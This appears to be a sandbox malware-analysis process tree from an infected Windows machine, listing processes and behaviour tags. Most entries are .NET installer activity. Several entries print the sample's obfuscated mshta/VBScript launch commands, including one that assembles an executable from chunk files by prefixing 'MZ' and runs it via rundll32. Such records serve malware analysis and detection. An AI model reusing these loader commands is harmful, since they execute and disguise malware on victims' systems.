C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:275457 /prefetch:211⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:668685 /prefetch:211⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:406549 /prefetch:211⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2492 CREDAT:865302 /prefetch:211⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵
- Executes dropped EXE
-
C:\140829a1818fa6f73f98e5c5f3\Setup.exeC:\140829a1818fa6f73f98e5c5f3\\Setup.exe /q /norestart /x86 /x64 /web10⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\140829a1818fa6f73f98e5c5f3\SetupUtility.exeSetupUtility.exe /screboot11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu164ba03be19.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\3321.exeC:\Users\Admin\AppData\Local\Temp\3321.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Modifies firewall policy service
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 3305B2FC460EDC818C2E42C2AD47DCBA2⤵
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\netmemorycache.ini"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe" -iru3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\wbem\mofcomp.exemofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof4⤵
- Drops file in System32 directory
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelPerformanceCounters.man"3⤵
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"3⤵
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_SMSvcHostPerfCounters.ini"3⤵
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_TransactionBridgePerfCounters.ini"3⤵
- Drops file in Windows directory
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounters.ini"3⤵
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_Networkingperfcounters.ini3⤵
- Drops file in Windows directory
-
C:\Windows\system32\lodctr.exe"C:\Windows\system32\lodctr.exe" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe update /queue3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems 13⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 130 -InterruptEvent 0 -NGENProcess e8 -Pipe f4 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent e8 -InterruptEvent 0 -NGENProcess 194 -Pipe 1a0 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8927DDDF7403AD32B6CEC7F5206E9FA52⤵
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\netmemorycache.ini"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\wbem\mofcomp.exemofcomp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet.mof4⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelPerformanceCounters.man"3⤵
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" /m:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WorkflowServiceHostPerformanceCounters.man"3⤵
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_SMSvcHostPerfCounters.ini"3⤵
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.ini"3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounters.ini"3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_Networkingperfcounters.ini3⤵
-
C:\Windows\SysWOW64\lodctr.exe"C:\Windows\SysWOW64\lodctr.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\_DataOracleClientPerfCounters_shared12_neutral.ini3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe update /queue3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe executeQueuedItems 13⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 144 -InterruptEvent 0 -NGENProcess 104 -Pipe 110 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 104 -InterruptEvent 0 -NGENProcess 1a0 -Pipe 14c -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1a8 -InterruptEvent 0 -NGENProcess 10c -Pipe 1a0 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ac -InterruptEvent 0 -NGENProcess 104 -Pipe 10c -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1a4 -InterruptEvent 0 -NGENProcess 1ac -Pipe 1b0 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1b8 -InterruptEvent 0 -NGENProcess 104 -Pipe 1ac -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1bc -InterruptEvent 0 -NGENProcess 1a4 -Pipe 104 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c0 -InterruptEvent 0 -NGENProcess 1b8 -Pipe 1a4 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 0 -NGENProcess 1bc -Pipe 1b8 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c8 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1bc -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1cc -InterruptEvent 0 -NGENProcess 1c4 -Pipe 1c0 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d0 -InterruptEvent 0 -NGENProcess 1c8 -Pipe 1c4 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1cc -Pipe 1c8 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1cc -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1dc -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1d0 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1d4 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1dc -Pipe 1d8 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1dc -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1e0 -Comment "NGen Worker Process"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1e4 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 144 -Pipe 1f0 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 1ec -Pipe 144 -Comment "NGen Worker Process"4⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1ec -Comment "NGen Worker Process"4⤵
-
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 713106B227A70FA1598FF8D027BB63FC M Global\MSI00002⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe" -msi -ia -v3⤵
- Executes dropped EXE
-
C:\Windows\system32\wevtutil.exeum C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man4⤵
-
C:\Windows\system32\wevtutil.exeim C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.45.man4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.tlb"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.tlb"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Drawing.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.EnterpriseServices.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\system32\wbem\mofcomp.exe"C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel.mof"3⤵
- Drops file in System32 directory
-
C:\Windows\system32\wbem\mofcomp.exe"C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MOF\ServiceModel35.mof"3⤵
- Drops file in System32 directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C15451A781A400E1484D8699C2816A30 M Global\MSI00002⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.JScript.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.EnterpriseServices.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regtlibv12.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Windows.Forms.tlb"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\wbem\mofcomp.exe"C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel.mof"3⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\wbem\mofcomp.exe"C:\Windows\SysWOW64\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MOF\ServiceModel35.mof"3⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskeng.exetaskeng.exe {ABD4BCD2-3D11-4BC8-998D-20D67620C0A0} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\hhjjfdrC:\Users\Admin\AppData\Roaming\hhjjfdr2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1914815-1921200576-601127148-14673450262058555430-341981100-15866500911435755881"1⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1413435178171689755219858382561657846805-78265368-99506235710216517081984182807"1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 190 -InterruptEvent 17c -NGENProcess 180 -Pipe 18c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 200 -InterruptEvent 17c -NGENProcess 180 -Pipe 190 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 1fc -NGENProcess 204 -Pipe 200 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1fc -InterruptEvent 1ec -NGENProcess 180 -Pipe 1e0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 208 -NGENProcess 17c -Pipe 1dc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 208 -InterruptEvent 180 -NGENProcess 17c -Pipe 1f0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 180 -InterruptEvent 214 -NGENProcess 20c -Pipe 210 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 214 -InterruptEvent 20c -NGENProcess 208 -Pipe 1f8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 20c -InterruptEvent 21c -NGENProcess 17c -Pipe 204 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 220 -InterruptEvent 214 -NGENProcess 224 -Pipe 20c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 214 -InterruptEvent 198 -NGENProcess 17c -Pipe 180 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 17c -NGENProcess 220 -Pipe 21c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 17c -InterruptEvent 22c -NGENProcess 224 -Pipe 1fc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 22c -InterruptEvent 224 -NGENProcess 198 -Pipe 228 -Comment "NGen Worker Process"2⤵
-
